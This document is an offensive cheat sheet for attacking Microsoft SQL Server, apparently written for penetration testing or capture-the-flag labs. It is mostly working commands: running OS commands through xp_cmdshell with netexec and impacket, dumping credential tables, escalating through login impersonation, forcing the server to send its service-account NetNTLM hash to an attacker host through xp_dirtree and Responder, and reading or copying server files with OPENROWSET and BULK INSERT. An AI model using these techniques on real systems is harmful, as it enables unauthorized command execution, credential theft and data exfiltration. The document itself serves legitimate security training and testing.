MSSQL (TCP 1433)
# Authenticated access with a domain account. Both tools take the password on the command line,
# so it lands in shell history and `ps` output — prefer a prompt/hash or a throw-away shell on engagements.
# netexec -x runs the OS command through xp_cmdshell (it enables it if it can — see below); output is the service account's context.
netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami"
# impacket interactive client; -windows-auth = NTLM/Kerberos login, drop it for a native SQL login (e.g. sa).
mssqlclient.py -p 1433 domain.local/adot8:password@10.10.10.101 -windows-auth
Enable xp_cmdshell (needs ALTER SETTINGS, i.e. sysadmin/serveradmin; it is off by default)
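-- Enable xp_cmdshell. Requires ALTER SETTINGS (sysadmin / serveradmin).
-- Commands run as the SQL Server service account (or its configured proxy), not as the SQL login.
-- This is a persistent, server-wide setting that gets logged — set it back to 0 when finished.
-- Bare procedure calls only work as the first statement of a batch; EXEC is the safe form.
-- (mssqlclient.py also has a built-in enable_xp_cmdshell command that does the same.)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
-- Cleanup when done:
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;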
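-- Same sequence with the explicit EXECUTE keyword (the original had "exexute" and an unterminated string).
-- Requires ALTER SETTINGS (sysadmin / serveradmin); xp_cmdshell output runs as the service account.
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';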
Enumeration
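-- Server and database discovery. sys.databases and master..sysdatabases return the same list
-- (sysdatabases is the legacy compatibility view).
SELECT @@version;
SELECT name FROM sys.databases;
SELECT name FROM master..sysdatabases;
USE adot8;
-- Tables in a database: INFORMATION_SCHEMA is the portable route, sysobjects (xtype 'U' = user table) the legacy one.
SELECT TABLE_SCHEMA, TABLE_NAME FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM <databaseName>..sysobjects WHERE xtype = 'U'; -- look for a users / credentials table
-- List the columns before dumping rows, so SELECT * is not run blind against a large table.
SELECT COLUMN_NAME, DATA_TYPE FROM <databaseName>.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users';
SELECT * FROM <databaseName>.dbo.users;
-- Two-dot form resolves the schema through the login's default schema (normally dbo).
SELECT * FROM <databaseName>..users;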
Impersonate a login (server level) or a database user
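-- Which logins can be impersonated, and by whom. For server-level IMPERSONATE the row has
-- class = 101 (server principal): major_id is the login being impersonated and
-- grantee_principal_id is the login allowed to do it. Joining on grantor_principal_id
-- (as the original did) reports who *granted* the permission, which is not always the target.
SELECT DISTINCT
    target.name  AS impersonatable_login,
    grantee.name AS grantee
FROM sys.server_permissions AS p
INNER JOIN sys.server_principals AS target
    ON p.major_id = target.principal_id
INNER JOIN sys.server_principals AS grantee
    ON p.grantee_principal_id = grantee.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class = 101;
-- Switch and verify, then drop back:
-- EXECUTE AS LOGIN = '<login>'; SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin'); ... REVERT;
-- Database-level equivalents live in sys.database_permissions / EXECUTE AS USER = '<user>'.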
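# mssqlclient.py built-ins (impacket): list what the current login may impersonate, then switch.
# The argument is the principal to impersonate (the target), not the grantor.
enum_impersonate
exec_as_login <login>   # server-level (sys.server_permissions), sets the login context
exec_as_user <user>     # database-level (sys.database_permissions), current database only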
Capture the SQL Server service account's NetNTLM hash (xp_dirtree + Responder)
# Listen for the SMB authentication that xp_dirtree (below) forces the server to make; tun0 = VPN interface.
sudo responder -I tun0
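-- Make the server list a UNC path on the attacker box; the outbound SMB connection authenticates
-- with the SQL Server service (or machine) account, so that is whose NetNTLM hash Responder sees —
-- not the login you connected as. xp_dirtree takes a quoted string and is usually executable by public.
EXEC master..xp_dirtree '\\10.10.14.3\adot8\';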
Read a file (OPENROWSET BULK — needs ADMINISTER BULK OPERATIONS / bulkadmin)
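-- Read a file from the server's filesystem. Needs ADMINISTER BULK OPERATIONS (bulkadmin role);
-- the read is performed by the service account, so its NTFS permissions decide what is readable.
-- SINGLE_CLOB returns the whole file as one varchar(max) row.
SELECT x
FROM OPENROWSET(BULK 'C:\Users\Administrator\root.txt', SINGLE_CLOB) AS R(x);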
Copy a file (BULK INSERT error-file trick — same bulkadmin requirement)
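-- Copy a file through BULK INSERT's error file: every input row that fails to parse into the
-- single INT column is written verbatim to ERRORFILE. Rows that do parse (blank lines, a lone
-- integer) are loaded instead of copied, so the result can be partial.
-- Needs ADMINISTER BULK OPERATIONS; the read and the write both happen as the service account.
-- ERRORFILE must not already exist (the statement fails otherwise) and a companion
-- <errorfile>.Error.Txt is created as well — remember both when cleaning up.
-- Default MAXERRORS is 10, after which the load aborts; raise it so larger files are copied whole.
CREATE TABLE #errortable (ignore INT);
BULK INSERT #errortable
FROM '\\localhost\c$\windows\win.ini'
WITH (
    FIELDTERMINATOR = ',',
    ROWTERMINATOR = '\n',
    ERRORFILE = 'c:\thatjusthappend.txt',
    MAXERRORS = 1000000
);
DROP TABLE #errortable;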